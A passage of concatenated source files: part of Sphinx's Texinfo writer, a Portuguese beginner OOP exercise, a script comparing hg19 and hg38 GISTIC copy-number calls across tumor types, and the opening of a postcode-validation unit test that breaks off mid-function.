self.body.append('@uref{%s,%s}' % (uri, name))
elif show_urls == 'no':
self.body.append('@uref{%s,,%s}' % (uri, name))
else:
self.body.append('%s@footnote{%s}' % (name, uri))
raise nodes.SkipNode
def depart_reference(self, node: Element) -> None:
pass
def visit_number_reference(self, node: Element) -> None:
text = nodes.Text(node.get('title', '#'))
self.visit_Text(text)
raise nodes.SkipNode
def visit_title_reference(self, node: Element) -> None:
text = node.astext()
self.body.append('@cite{%s}' % self.escape_arg(text))
raise nodes.SkipNode
# -- Blocks
def visit_paragraph(self, node: Element) -> None:
self.body.append('\n')
def depart_paragraph(self, node: Element) -> None:
self.body.append('\n')
def visit_block_quote(self, node: Element) -> None:
self.body.append('\n@quotation\n')
def depart_block_quote(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end quotation\n')
def visit_literal_block(self, node: Element) -> None:
self.body.append('\n@example\n')
def depart_literal_block(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end example\n')
visit_doctest_block = visit_literal_block
depart_doctest_block = depart_literal_block
def visit_line_block(self, node: Element) -> None:
if not isinstance(node.parent, nodes.line_block):
self.body.append('\n\n')
self.body.append('@display\n')
def depart_line_block(self, node: Element) -> None:
self.body.append('@end display\n')
if not isinstance(node.parent, nodes.line_block):
self.body.append('\n\n')
def visit_line(self, node: Element) -> None:
self.escape_newlines += 1
def depart_line(self, node: Element) -> None:
self.body.append('@w{ }\n')
self.escape_newlines -= 1
# -- Inline
def visit_strong(self, node: Element) -> None:
self.body.append('@strong{')
def depart_strong(self, node: Element) -> None:
self.body.append('}')
def visit_emphasis(self, node: Element) -> None:
element = 'emph' if not self.in_samp else 'var'
self.body.append('@%s{' % element)
def depart_emphasis(self, node: Element) -> None:
self.body.append('}')
def is_samp(self, node: Element) -> bool:
return 'samp' in node['classes']
def visit_literal(self, node: Element) -> None:
if self.is_samp(node):
self.in_samp += 1
self.body.append('@code{')
def depart_literal(self, node: Element) -> None:
if self.is_samp(node):
self.in_samp -= 1
self.body.append('}')
def visit_superscript(self, node: Element) -> None:
self.body.append('@w{^')
def depart_superscript(self, node: Element) -> None:
self.body.append('}')
def visit_subscript(self, node: Element) -> None:
self.body.append('@w{[')
def depart_subscript(self, node: Element) -> None:
self.body.append(']}')
# -- Footnotes
def visit_footnote(self, node: Element) -> None:
raise nodes.SkipNode
def visit_collected_footnote(self, node: Element) -> None:
self.in_footnote += 1
self.body.append('@footnote{')
def depart_collected_footnote(self, node: Element) -> None:
self.body.append('}')
self.in_footnote -= 1
def visit_footnote_reference(self, node: Element) -> None:
num = node.astext().strip()
try:
footnode, used = self.footnotestack[-1][num]
except (KeyError, IndexError) as exc:
raise nodes.SkipNode from exc
# footnotes are repeated for each reference
footnode.walkabout(self) # type: ignore
raise nodes.SkipChildren
def visit_citation(self, node: Element) -> None:
self.body.append('\n')
for id in node.get('ids'):
self.add_anchor(id, node)
self.escape_newlines += 1
def depart_citation(self, node: Element) -> None:
self.escape_newlines -= 1
def visit_citation_reference(self, node: Element) -> None:
self.body.append('@w{[')
def depart_citation_reference(self, node: Element) -> None:
self.body.append(']}')
# -- Lists
def visit_bullet_list(self, node: Element) -> None:
bullet = node.get('bullet', '*')
self.body.append('\n\n@itemize %s\n' % bullet)
def depart_bullet_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end itemize\n')
def visit_enumerated_list(self, node: Element) -> None:
# doesn't support Roman numerals
enum = node.get('enumtype', 'arabic')
starters = {'arabic': '',
'loweralpha': 'a',
'upperalpha': 'A'}
start = node.get('start', starters.get(enum, ''))
self.body.append('\n\n@enumerate %s\n' % start)
def depart_enumerated_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end enumerate\n')
def visit_list_item(self, node: Element) -> None:
self.body.append('\n@item ')
def depart_list_item(self, node: Element) -> None:
pass
# -- Option List
def visit_option_list(self, node: Element) -> None:
self.body.append('\n\n@table @option\n')
def depart_option_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end table\n')
def visit_option_list_item(self, node: Element) -> None:
pass
def depart_option_list_item(self, node: Element) -> None:
pass
def visit_option_group(self, node: Element) -> None:
self.at_item_x = '@item'
def depart_option_group(self, node: Element) -> None:
pass
def visit_option(self, node: Element) -> None:
self.escape_hyphens += 1
self.body.append('\n%s ' % self.at_item_x)
self.at_item_x = '@itemx'
def depart_option(self, node: Element) -> None:
self.escape_hyphens -= 1
def visit_option_string(self, node: Element) -> None:
pass
def depart_option_string(self, node: Element) -> None:
pass
def visit_option_argument(self, node: Element) -> None:
self.body.append(node.get('delimiter', ' '))
def depart_option_argument(self, node: Element) -> None:
pass
def visit_description(self, node: Element) -> None:
self.body.append('\n')
def depart_description(self, node: Element) -> None:
pass
# -- Definitions
def visit_definition_list(self, node: Element) -> None:
self.body.append('\n\n@table @asis\n')
def depart_definition_list(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end table\n')
def visit_definition_list_item(self, node: Element) -> None:
self.at_item_x = '@item'
def depart_definition_list_item(self, node: Element) -> None:
pass
def visit_term(self, node: Element) -> None:
for id in node.get('ids'):
self.add_anchor(id, node)
# anchors and indexes need to go in front
for n in node[::]:
if isinstance(n, (addnodes.index, nodes.target)):
n.walkabout(self)
node.remove(n)
self.body.append('\n%s ' % self.at_item_x)
self.at_item_x = '@itemx'
def depart_term(self, node: Element) -> None:
pass
def visit_classifier(self, node: Element) -> None:
self.body.append(' : ')
def depart_classifier(self, node: Element) -> None:
pass
def visit_definition(self, node: Element) -> None:
self.body.append('\n')
def depart_definition(self, node: Element) -> None:
pass
# -- Tables
def visit_table(self, node: Element) -> None:
self.entry_sep = '@item'
def depart_table(self, node: Element) -> None:
self.body.append('\n@end multitable\n\n')
def visit_tabular_col_spec(self, node: Element) -> None:
pass
def depart_tabular_col_spec(self, node: Element) -> None:
pass
def visit_colspec(self, node: Element) -> None:
self.colwidths.append(node['colwidth'])
if len(self.colwidths) != self.n_cols:
return
self.body.append('\n\n@multitable ')
for n in self.colwidths:
self.body.append('{%s} ' % ('x' * (n + 2)))
def depart_colspec(self, node: Element) -> None:
pass
def visit_tgroup(self, node: Element) -> None:
self.colwidths = []
self.n_cols = node['cols']
def depart_tgroup(self, node: Element) -> None:
pass
def visit_thead(self, node: Element) -> None:
self.entry_sep = '@headitem'
def depart_thead(self, node: Element) -> None:
pass
def visit_tbody(self, node: Element) -> None:
pass
def depart_tbody(self, node: Element) -> None:
pass
def visit_row(self, node: Element) -> None:
pass
def depart_row(self, node: Element) -> None:
self.entry_sep = '@item'
def visit_entry(self, node: Element) -> None:
self.body.append('\n%s\n' % self.entry_sep)
self.entry_sep = '@tab'
def depart_entry(self, node: Element) -> None:
for _i in range(node.get('morecols', 0)):
self.body.append('\n@tab\n')
# -- Field Lists
def visit_field_list(self, node: Element) -> None:
pass
def depart_field_list(self, node: Element) -> None:
pass
def visit_field(self, node: Element) -> None:
self.body.append('\n')
def depart_field(self, node: Element) -> None:
self.body.append('\n')
def visit_field_name(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@*')
def depart_field_name(self, node: Element) -> None:
self.body.append(': ')
def visit_field_body(self, node: Element) -> None:
pass
def depart_field_body(self, node: Element) -> None:
pass
# -- Admonitions
def visit_admonition(self, node: Element, name: str = '') -> None:
if not name:
title = cast(nodes.title, node[0])
name = self.escape(title.astext())
self.body.append('\n@cartouche\n@quotation %s ' % name)
def _visit_named_admonition(self, node: Element) -> None:
label = admonitionlabels[node.tagname]
self.body.append('\n@cartouche\n@quotation %s ' % label)
def depart_admonition(self, node: Element) -> None:
self.ensure_eol()
self.body.append('@end quotation\n'
'@end cartouche\n')
visit_attention = _visit_named_admonition
depart_attention = depart_admonition
visit_caution = _visit_named_admonition
depart_caution = depart_admonition
visit_danger = _visit_named_admonition
depart_danger = depart_admonition
visit_error = _visit_named_admonition
depart_error = depart_admonition
visit_hint = _visit_named_admonition
depart_hint = depart_admonition
visit_important = _visit_named_admonition
depart_important = depart_admonition
visit_note = _visit_named_admonition
depart_note = depart_admonition
visit_tip = _visit_named_admonition
depart_tip = depart_admonition
visit_warning = _visit_named_admonition
depart_warning = depart_admonition
# -- Misc
def visit_docinfo(self, node: Element) -> None:
raise nodes.SkipNode
def visit_generated(self, node: Element) -> None:
raise nodes.SkipNode
def visit_header(self, node: Element) -> None:
raise nodes.SkipNode
def visit_footer(self, node: Element) -> None:
raise nodes.SkipNode
def visit_container(self, node: Element) -> None:
if node.get('literal_block'):
self.body.append('\n\n@float LiteralBlock\n')
def depart_container(self, node: Element) -> None:
if node.get('literal_block'):
self.body.append('\n@end float\n\n')
def visit_decoration(self, node: Element) -> None:
pass
def depart_decoration(self, node: Element) -> None:
pass
def visit_topic(self, node: Element) -> None:
# ignore TOC's since we have to have a "menu" anyway
if 'contents' in node.get('classes', []):
raise nodes.SkipNode
title = cast(nodes.title, node[0])
self.visit_rubric(title)
self.body.append('%s\n' % self.escape(title.astext()))
self.depart_rubric(title)
def depart_topic(self, node: Element) -> None:
pass
def visit_transition(self, node: Element) -> None:
self.body.append('\n\n%s\n\n' % ('_' * 66))
def depart_transition(self, node: Element) -> None:
pass
def visit_attribution(self, node: Element) -> None:
self.body.append('\n\n@center --- ')
def depart_attribution(self, node: Element) -> None:
self.body.append('\n\n')
def visit_raw(self, node: Element) -> None:
format = node.get('format', '').split()
if 'texinfo' in format or 'texi' in format:
self.body.append(node.astext())
raise nodes.SkipNode
def visit_figure(self, node: Element) -> None:
self.body.append('\n\n@float Figure\n')
def depart_figure(self, node: Element) -> None:
self.body.append('\n@end float\n\n')
def visit_caption(self, node: Element) -> None:
if (isinstance(node.parent, nodes.figure) or
(isinstance(node.parent, nodes.container) and
node.parent.get('literal_block'))):
self.body.append('\n@caption{')
else:
logger.warning(__('caption not inside a figure.'),
location=node)
def depart_caption(self, node: Element) -> None:
if (isinstance(node.parent, nodes.figure) or
(isinstance(node.parent, nodes.container) and
node.parent.get('literal_block'))):
self.body.append('}\n')
def visit_image(self, node: Element) -> None:
if node['uri'] in self.builder.images:
uri = self.builder.images[node['uri']]
else:
# missing image!
if self.ignore_missing_images:
return
uri = node['uri']
if uri.find('://') != -1:
# ignore remote images
return
name, ext = path.splitext(uri)
# width and height ignored in non-tex output
width = self.tex_image_length(node.get('width', ''))
height = self.tex_image_length(node.get('height', ''))
alt = self.escape_arg(node.get('alt', ''))
filename = "%s-figures/%s" % (self.elements['filename'][:-5], name) # type: ignore
self.body.append('\n@image{%s,%s,%s,%s,%s}\n' %
(filename, width, height, alt, ext[1:]))
def depart_image(self, node: Element) -> None:
pass
def visit_compound(self, node: Element) -> None:
pass
def depart_compound(self, node: Element) -> None:
pass
def visit_sidebar(self, node: Element) -> None:
self.visit_topic(node)
def depart_sidebar(self, node: Element) -> None:
self.depart_topic(node)
def visit_label(self, node: Element) -> None:
# label numbering is automatically generated by Texinfo
if self.in_footnote:
raise nodes.SkipNode
else:
self.body.append('@w{(')
def depart_label(self, node: Element) -> None:
self.body.append(')} ')
def visit_legend(self, node: Element) -> None:
pass
def depart_legend(self, node: Element) -> None:
pass
def visit_substitution_reference(self, node: Element) -> None:
pass
def depart_substitution_reference(self, node: Element) -> None:
pass
def visit_substitution_definition(self, node: Element) -> None:
raise nodes.SkipNode
def visit_system_message(self, node: Element) -> None:
self.body.append('\n@verbatim\n'
'<SYSTEM MESSAGE: %s>\n'
'@end verbatim\n' % node.astext())
raise nodes.SkipNode
def visit_comment(self, node: Element) -> None:
self.body.append('\n')
for line in node.astext().splitlines():
self.body.append('@c %s\n' % line)
raise nodes.SkipNode
def visit_problematic(self, node: Element) -> None:
self.body.append('>>')
def depart_problematic(self, node: Element) -> None:
self.body.append('<<')
def unimplemented_visit(self, node: Element) -> None:
logger.warning(__("unimplemented node type: %r"), node,
location=node)
def unknown_departure(self, node: Node) -> None:
pass
# -- Sphinx specific
def visit_productionlist(self, node: Element) -> None:
self.visit_literal_block(None)
names = []
productionlist = cast(Iterable[addnodes.production], node)
for production in productionlist:
names.append(production['tokenname'])
maxlen = max(len(name) for name in names)
for production in productionlist:
if production['tokenname']:
for id in production.get('ids'):
self.add_anchor(id, production)
s = production['tokenname'].ljust(maxlen) + ' ::='
else:
s = '%s ' % (' ' * maxlen)
self.body.append(self.escape(s))
self.body.append(self.escape(production.astext() + '\n'))
self.depart_literal_block(None)
raise nodes.SkipNode
def visit_production(self, node: Element) -> None:
pass
def depart_production(self, node: Element) -> None:
pass
def visit_literal_emphasis(self, node: Element) -> None:
self.body.append('@code{')
def depart_literal_emphasis(self, node: Element) -> None:
self.body.append('}')
def visit_literal_strong(self, node: Element) -> None:
self.body.append('@code{')
def depart_literal_strong(self, node: Element) -> None:
self.body.append('}')
def visit_index(self, node: Element) -> None:
# terminate the line but don't prevent paragraph breaks
if isinstance(node.parent, nodes.paragraph):
self.ensure_eol()
else:
self.body.append('\n')
for entry in node['entries']:
typ, text, tid, text2, key_ = entry
text = self.escape_menu(text)
self.body.append('@geindex %s\n' % text)
def visit_versionmodified(self, node: Element) -> None:
self.body.append('\n')
def depart_versionmodified(self, node: Element) -> None:
self.body.append('\n')
def visit_start_of_file(self, node: Element) -> None:
# add a document target
self.next_section_ids.add(':doc')
self.curfilestack.append(node['docname'])
self.footnotestack.append(self.collect_footnotes(node))
def depart_start_of_file(self, node: Element) -> None:
self.curfilestack.pop()
self.footnotestack.pop()
def visit_centered(self, node: Element) -> None:
txt = self.escape_arg(node.astext())
self.body.append('\n\n@center %s\n\n' % txt)
raise nodes.SkipNode
def visit_seealso(self, node: Element) -> None:
self.body.append('\n\n@subsubheading %s\n\n' %
admonitionlabels['seealso'])
def depart_seealso(self, node: Element) -> None:
self.body.append('\n')
def visit_meta(self, node: Element) -> None:
raise nodes.SkipNode
def visit_glossary(self, node: Element) -> None:
pass
def depart_glossary(self, node: Element) -> None:
pass
def visit_acks(self, node: Element) -> None:
bullet_list = cast(nodes.bullet_list, node[0])
list_items = cast(Iterable[nodes.list_item], bullet_list)
self.body.append('\n\n')
self.body.append(', '.join(n.astext() for n in list_items) + '.')
self.body.append('\n\n')
raise nodes.SkipNode
#############################################################
# Domain-specific object descriptions
#############################################################
# Top-level nodes for descriptions
##################################
def visit_desc(self, node: addnodes.desc) -> None:
self.descs.append(node)
self.at_deffnx = '@deffn'
def depart_desc(self, node: addnodes.desc) -> None:
self.descs.pop()
self.ensure_eol()
self.body.append('@end deffn\n')
def visit_desc_signature(self, node: Element) -> None:
self.escape_hyphens += 1
objtype = node.parent['objtype']
if objtype != 'describe':
for id in node.get('ids'):
self.add_anchor(id, node)
# use the full name of the objtype for the category
try:
domain = self.builder.env.get_domain(node.parent['domain'])
name = domain.get_type_name(domain.object_types[objtype],
self.config.primary_domain == domain.name)
except (KeyError, ExtensionError):
name = objtype
# by convention, the deffn category should be capitalized like a title
category = self.escape_arg(smart_capwords(name))
self.body.append('\n%s {%s} ' % (self.at_deffnx, category))
self.at_deffnx = '@deffnx'
self.desc_type_name = name
def depart_desc_signature(self, node: Element) -> None:
self.body.append("\n")
self.escape_hyphens -= 1
self.desc_type_name = None
def visit_desc_signature_line(self, node: Element) -> None:
pass
def depart_desc_signature_line(self, node: Element) -> None:
pass
def visit_desc_content(self, node: Element) -> None:
pass
def depart_desc_content(self, node: Element) -> None:
pass
def visit_desc_inline(self, node: Element) -> None:
pass
def depart_desc_inline(self, node: Element) -> None:
pass
# Nodes for high-level structure in signatures
##############################################
def visit_desc_name(self, node: Element) -> None:
pass
def depart_desc_name(self, node: Element) -> None:
pass
def visit_desc_addname(self, node: Element) -> None:
pass
def depart_desc_addname(self, node: Element) -> None:
pass
def visit_desc_type(self, node: Element) -> None:
pass
def depart_desc_type(self, node: Element) -> None:
pass
def visit_desc_returns(self, node: Element) -> None:
self.body.append(' -> ')
def depart_desc_returns(self, node: Element) -> None:
pass
def visit_desc_parameterlist(self, node: Element) -> None:
self.body.append(' (')
self.first_param = 1
def depart_desc_parameterlist(self, node: Element) -> None:
self.body.append(')')
def visit_desc_parameter(self, node: Element) -> None:
if not self.first_param:
self.body.append(', ')
else:
self.first_param = 0
text = self.escape(node.astext())
# replace no-break spaces with normal ones
text = text.replace(' ', '@w{ }')
self.body.append(text)
raise nodes.SkipNode
def visit_desc_optional(self, node: Element) -> None:
self.body.append('[')
def depart_desc_optional(self, node: Element) -> None:
self.body.append(']')
def visit_desc_annotation(self, node: Element) -> None:
# Try to avoid duplicating info already displayed by the deffn category.
# e.g.
# @deffn {Class} Foo
# -- instead of --
# @deffn {Class} class Foo
txt = node.astext().strip()
if ((self.descs and txt == self.descs[-1]['objtype']) or
(self.desc_type_name and txt in self.desc_type_name.split())):
raise nodes.SkipNode
def depart_desc_annotation(self, node: Element) -> None:
pass
##############################################
def visit_inline(self, node: Element) -> None:
pass
def depart_inline(self, node: Element) -> None:
pass
def visit_abbreviation(self, node: Element) -> None:
abbr = node.astext()
self.body.append('@abbr{')
if node.hasattr('explanation') and abbr not in self.handled_abbrs:
self.context.append(',%s}' % self.escape_arg(node['explanation']))
self.handled_abbrs.add(abbr)
else:
self.context.append('}')
def depart_abbreviation(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_manpage(self, node: Element) -> None:
return self.visit_literal_emphasis(node)
def depart_manpage(self, node: Element) -> None:
return self.depart_literal_emphasis(node)
def visit_download_reference(self, node: Element) -> None:
pass
def depart_download_reference(self, node: Element) -> None:
pass
def visit_hlist(self, node: Element) -> None:
self.visit_bullet_list(node)
def depart_hlist(self, node: Element) -> None:
self.depart_bullet_list(node)
def visit_hlistcol(self, node: Element) -> None:
pass
def depart_hlistcol(self, node: Element) -> None:
pass
def visit_pending_xref(self, node: Element) -> None:
pass
def depart_pending_xref(self, node: Element) -> None:
pass
def visit_math(self, node: Element) -> None:
self.body.append('@math{' + self.escape_arg(node.astext()) + '}')
raise nodes.SkipNode
def visit_math_block(self, node: Element) -> None:
if node.get('label'):
self.add_anchor(node['label'], node)
self.body.append('\n\n@example\n%s\n@end example\n\n' %
self.escape_arg(node.astext()))
raise nodes.SkipNode
@property
def desc(self) -> Optional[addnodes.desc]:
warnings.warn('TexinfoWriter.desc is deprecated.', RemovedInSphinx50Warning)
if len(self.descs):
return self.descs[-1]
else:
return None
# ---- end of file: sphinx/writers/texinfo.py (repo: Bibo-Joshi/sphinx, license: BSD-2-Clause) ----
class Pessoa:
def __init__(self, nome, idade):
self._nome = nome
self._idade = idade
@property
def nome(self):
return self._nome
@property
def idade(self):
return self._idade
class Cliente(Pessoa):
def __init__(self, nome, idade):
super().__init__(nome, idade)
self.conta = None
def inserir_conta(self, tipo_conta):
self.conta = tipo_conta
return
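# Minimal usage sketch (added for illustration; `conta_corrente` is a hypothetical
# account object defined elsewhere in the exercise):
# cliente = Cliente('Renato', 30)
# cliente.inserir_conta(conta_corrente)
# print(cliente.nome, cliente.idade)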
# ---- end of file: aprendizado/udemy/03_desafio_POO/cliente.py (repo: renatodev95/Python, license: MIT) ----
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 22 17:28:54 2018
@author: galengao
This is the original analysis code as it exists in the environment where it was written and initially run.
Portions and modifications of this script constitute all other .py scripts in this directory.
"""
import numpy as np
import pandas as pd
from collections import Counter
import matplotlib.pyplot as plt
import seaborn as sns
### Helper Function to Load in the Data ###
def load_data(coh, thresh=False):
"""Load in the hg38 and hg19 gistic thresholded data. Assume GISTIC runs
for each tumor type live in a parent directory (hg38_gistic or hg19_gistic)
one level up from this script."""
if thresh:
hg38 = '../hg38_gistic/'+coh+'/all_thresholded.by_genes.txt'
hg19 = '../hg19_gistic/'+coh+'/all_thresholded.by_genes.txt'
hg38drops = ['Cytoband', 'Locus ID']
else:
hg38 = '../hg38_gistic/'+coh+'/all_data_by_genes.txt'
hg19 = '../hg19_gistic/'+coh+'/all_data_by_genes.txt'
hg38drops = ['Cytoband', 'Gene ID']
df_hg19 = pd.read_table(hg19, index_col=[0]).drop(['Cytoband', 'Locus ID'], axis=1)
df_hg38 = pd.read_table(hg38, index_col=[0]).drop(hg38drops, axis=1)
same_samps = list(set(df_hg38.columns) & set(df_hg19.columns))
same_genes = list(set(df_hg38.index) & set(df_hg19.index))
print(coh, len(same_genes), len(same_samps))
    return df_hg38[same_samps].T[same_genes], df_hg19[same_samps].T[same_genes]
### Raw Copy Number Values Analysis Code ###
def raw_value_comparison(coh, plot=False):
"""Return the average differences in raw copy number values between the
gene-level calls in hg19 and hg38 for each gene for a given tumor type
'coh.' If plot=True, plot the genes' differences in a histogram."""
# load in the data
df_38, df_19 = load_data(coh, thresh=False)
# compute average sample-by-sample differences for each gene
df_s = df_38 - df_19
avg_diff = {g:np.average(df_s[g]) for g in df_s.columns.get_level_values('Gene Symbol')}
# take note of which genes are altered more than our threshold of 4*std
results = []
std = np.std([avg_diff[x] for x in avg_diff])
for g in avg_diff:
if avg_diff[g] > 4 * std:
results.append([coh, 'Pos', g, avg_diff[g]])
elif avg_diff[g] < -4 * std:
results.append([coh, 'Neg', g, avg_diff[g]])
if plot:
plt.hist([avg_diff[x] for x in avg_diff], bins=1000)
plt.title(coh, fontsize=16)
plt.xlabel('Average CN Difference Between Alignments', fontsize=14)
plt.ylabel('Genes', fontsize=14)
sns.despine()
plt.savefig('./genehists/'+coh+'_genehist.pdf')
plt.savefig('./genehists/'+coh+'_genehist.png')
plt.clf()
return results
def sequential_cohort_test_raw_values(cohs, plot=False):
"""Sequentially compare raw gene-level calls for the given tumor types."""
c_results = []
for coh in cohs: # perform raw value comparison for each cohort
c_results += raw_value_comparison(coh, plot=plot)
# compile results together
df_r = pd.DataFrame(c_results, columns=['Cohort', 'Direction', 'Gene', 'Difference'])
gcount = Counter(df_r['Gene'])
pos_gcount = Counter(df_r[df_r['Direction']=='Pos']['Gene'])
neg_gcount = Counter(df_r[df_r['Direction']=='Neg']['Gene'])
df = pd.DataFrame([gcount[x] for x in gcount], index=gcount.keys(), columns=['Count'])
df['Count_pos'] = [pos_gcount[x] if x in pos_gcount else 0 for x in gcount]
df['Count_neg'] = [neg_gcount[x] if x in neg_gcount else 0 for x in gcount]
if plot: # write output
plt.plot(np.sort([gcount[x] for x in gcount])[::-1], 'b-')
plt.xlabel('Gene by Rank', fontsize=16)
plt.ylabel('Number of Occurences', fontsize=16)
sns.despine()
plt.savefig('GeneDevianceDropoff.pdf')
plt.savefig('GeneDevianceDropoff.png')
df_r.to_csv('./genehists/LargestDifferences.tsv', sep='\t', index=False)
df.to_csv('./genehists/LargestDifferenceGenes_ByCount.tsv', sep='\t', index=True)
### Thresholded Copy Number Values Analysis Code ###
def thresholded_value_comparison(df_hg38, df_hg19, metric='hamming'):
"""Compare -2,-1,0,1,2 gene-level thresholded calls. metric can be either
hamming (number of discrepancies in each gene) or manhattan (sum of
'distances' between each gene so a 1 to -1 change is 2). Returns a vector
of each gene's metric."""
out = []
for i, g in enumerate(df_hg38.columns):
if metric == 'hamming':
out.append(sum(df_hg19[g] != df_hg38[g])/len(df_hg19))
elif metric == 'manhattan':
out.append(sum(abs((df_hg19[g] - df_hg38[g]))))
return pd.DataFrame(out, index=df_hg38.columns)
def sequential_cohort_test_thresholded_values(cohs):
"""Compare thresholded gene-level calls for input tumor types."""
df_out = pd.DataFrame([])
for coh in cohs:
df_hg38, df_hg19 = load_data(coh, thresh=True)
df_results = thresholded_value_comparison(df_hg38, df_hg19, metric='hamming')
df_results.columns = [coh]
df_out = df_out.join(df_results, how='outer')
df_out.to_csv('../readout/DiscordantSampleFractions_perGene_perCohort_thresholdedCalls.tsv', sep='\t')
return df_out
def plot_fractionDisagreements_perCohort(cohs):
"""Visualize fraction of samples with disagreements in thresholded copy
number for each gene. Run sequential_cohort_test_thresholded_values()
before this function."""
# Read in data written by sequential_cohort_test_thresholded_values
df = sequential_cohort_test_thresholded_values(cohs)
df_box = pd.melt(df.reset_index(), id_vars='Gene Symbol').set_index('Gene Symbol')
df_box.columns = ['Tumor Type', 'Fraction of Samples with Disagreements']
dft = df.T
dft['med_degenerates'] = df.median(axis=0)
boxorder = dft.sort_values('med_degenerates', axis=0).index
# read in copy number burden data (requires aneuploidy RecurrentSCNA calls)
df_cn = pd.read_table('../../PanCanAneuploidy/bin/PANCAN_armonly_ASandpuritycalls_092817_xcellcalls.txt', index_col=0, usecols=[0,1,2,16])
coh_medians = [int(np.median(df_cn[df_cn['Type']==x]['RecurrentSCNA'].dropna())) for x in df_cn.Type.unique()]
df_med = pd.DataFrame(coh_medians, index=df_cn.Type.unique(), columns=['med'])
# plot it out
pal = sns.color_palette('Blues', max(df_med.med)-min(df_med.med)+1)
my_pal = {c: pal[df_med.at[c,'med']] for c in df_med.index}
g = sns.boxplot(x=df_box.columns[0], y=df_box.columns[1], data=df_box, \
order=boxorder, fliersize=1, palette=my_pal, linewidth=0.5)
newxticks = [x+' ('+str(df_med.loc[x]['med'])+')' for x in boxorder]
g.set_xticklabels(newxticks, rotation=90)
plt.ylabel('Fraction with Disagreements', fontsize=12)
sns.despine()
plt.gcf().set_size_inches((8,3))
plt.savefig('2_thresholdedCN_boxplot.pdf', bbox_inches='tight')
plt.savefig('2_thresholdedCN_boxplot.png', bbox_inches='tight')
### Significantly Altered Focal Peaks Analysis Code ###
def peakgene_overlaps(combos, same_genes, normalize=False):
"""Count the number of genes that overlap when examing the hg19 & hg38
GISTIC runs' focal peaks."""
venn_numbers, gsu, gsi = [], [], []
for coh, ad in combos:
print(coh)
# put all significant genes in a list
fnames = ['../hg19_gistic/'+coh+ad+'genes.conf_99.txt', '../hg38_gistic/'+coh+ad+'genes.txt']
df38 = pd.read_table(fnames[0], index_col=0).drop(['q value','residual q value','wide peak boundaries'])
df19 = pd.read_table(fnames[1], index_col=0).drop(['q value','residual q value','wide peak boundaries'])
g_38 = set([x for col in df38.columns for x in df38[col].dropna()]) & same_genes
g_19 = set([x for col in df19.columns for x in df19[col].dropna()]) & same_genes
intersect, union = g_38 & g_19, g_38 | g_19
gsu.append(union)
gsi.append(intersect)
if normalize:
venn_numbers.append([len(g_19-intersect)/len(union),len(intersect)/len(union), len(g_38-intersect)/len(union)])
else:
venn_numbers.append([len(g_19-intersect),len(intersect), len(g_38-intersect)])
index = [x[0]+'_'+x[1][1:-1] for x in combos]
return pd.DataFrame(venn_numbers, index=index, columns=['hg19 only','Intersection','hg38 only'])
def plot_peakgene_overlaps(combos, same_genes, write=False):
"""Visualize the results of peakgene_overlaps function in bargraph form."""
df_out = peakgene_overlaps(combos, same_genes, normalize=False)
df_d, df_a = df_out[df_out.index.str.split('_').str[-1] == 'del'], \
df_out[df_out.index.str.split('_').str[-1] == 'amp']
for x in zip((df_d, df_a), ('Deletion Peak Memberships', 'Amplification Peak Memberships')):
x[0].index = x[0].index.str.split('_').str[0]
x[0].plot.bar(stacked=True, color=['#af8dc3', '#f7f7f7', '#7fbf7b'], linewidth=1, edgecolor='k')
plt.gca().set_xticklabels(x[0].index, rotation=90)
plt.title(x[1], fontsize=18)
plt.gcf().set_size_inches(10,8)
sns.despine()
plt.savefig(x[1].split(' ')[0]+'_peakMemberships.pdf', bbox_inches='tight')
plt.savefig(x[1].split(' ')[0]+'_peakMemberships.png', bbox_inches='tight')
plt.clf()
if write:
df_out.to_csv('VennStats_focalpeaks.tsv', sep='\t')
### Conservation of Significant Copy Number Driver Events Analysis Code ###
def documented_driver_differences():
"""Scan and analyze manually currated DocumentedDriverDifferences.txt file.
Returns: 1) Number of driver genes called in both hg19 & hg38 GISTIC peaks
2) Number of drivers missing in hg38 peaks that appeared in hg19 peaks and
3) Number of drivers present in hg38 peaks but absent from hg19 peaks."""
# read in table of documented driver differences
# (this table needs a manual curation to be generated)
df = pd.read_table('../DocumentedDriverDifferences.txt', index_col=0)
# process entries to have just yes/no calls (without parens & brackets)
df['hg19?'] = df['present in hg19?'].str.strip(')').str.strip('(').str.strip('[').str.strip(']')
df['hg38?'] = df['present in hg38?'].str.strip(')').str.strip('(').str.strip('[').str.strip(']')
# number of documented drivers that match in hg19 & hg38
matches = sum(df['hg19?'] == df['hg38?'])
# number of documented drivers that are in hg19 but not hg38 & vice versa
lostdrivers = len(df[(df['hg19?'] == 'yes') & (df['hg38?'] == 'no')])
recovereddrivers = len(df[(df['hg19?'] == 'no') & (df['hg38?'] == 'yes')])
# Return in order
return matches, lostdrivers, recovereddrivers
# set up the tumor types we want to analyze
cohs = ['ACC','BLCA','CESC','CHOL','COAD','DLBC','ESCA','GBM', 'HNSC','KICH',\
'KIRC','KIRP','LAML','LGG','LIHC','LUAD','LUSC','OV','PAAD','PCPG',\
'PRAD','READ','SARC','SKCM','STAD','TGCT','THCA','THYM','UCEC','UCS','UVM']
ads = ['/amp_', '/del_']
combos = [(c, a) for c in cohs for a in ads]
# grab list of genes present in both hg19 & hg38
df_hg38 = pd.read_table('../hg38_gistic/CHOL/all_thresholded.by_genes.txt', index_col=0, usecols=[0,1])
df_hg19 = pd.read_table('../hg19_gistic/CHOL/all_thresholded.by_genes.txt', index_col=0, usecols=[0,1])
same_genes = set(df_hg38.index) & set(df_hg19.index)
# action lines -- run the analysis
sequential_cohort_test_raw_values(cohs, plot=True)
plot_fractionDisagreements_perCohort(cohs)
plot_peakgene_overlaps(combos, same_genes, write=True)
print(documented_driver_differences())
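# Illustrative note: documented_driver_differences() returns the 3-tuple
# (matches, lostdrivers, recovereddrivers), so this final print emits something
# like "(120, 4, 7)" (numbers here are hypothetical).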
# ---- end of file: scripts/AnalysisCode.py (repo: gaog94/GDAN_QC_CopyNumber, license: MIT) ----
import unittest
from datatypes.exceptions import DataDoesNotMatchSchemaException
from datatypes import postcode_validator
class TestPostcodeValidation(unittest.TestCase):
def test_can_validate_postcode(self):
try:
postcode_validator.validate("WC2B6SE")
